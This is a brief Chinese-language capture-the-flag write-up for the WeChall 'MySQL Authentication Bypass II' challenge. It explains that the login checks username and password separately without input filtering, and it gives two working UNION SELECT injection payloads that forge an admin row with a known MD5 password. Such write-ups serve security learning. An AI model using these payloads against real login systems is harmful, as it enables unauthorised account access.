wechall MySQL Authentication Bypass II

首先看看源码

username password分开来验证。但是没做过滤

通常的利用方法是使用union构造已知MD5值的查询。

如果username存在则执行查询，并且为admin。我们用unnion 这条语句把判断给pass掉即可。

得出答案：

' union select 1,'admin' as username ,md5('1') as password from users where username ='admin'#

password:1
或者
username=123' union select 1,'admin',md5('password');# &password=password &login=Login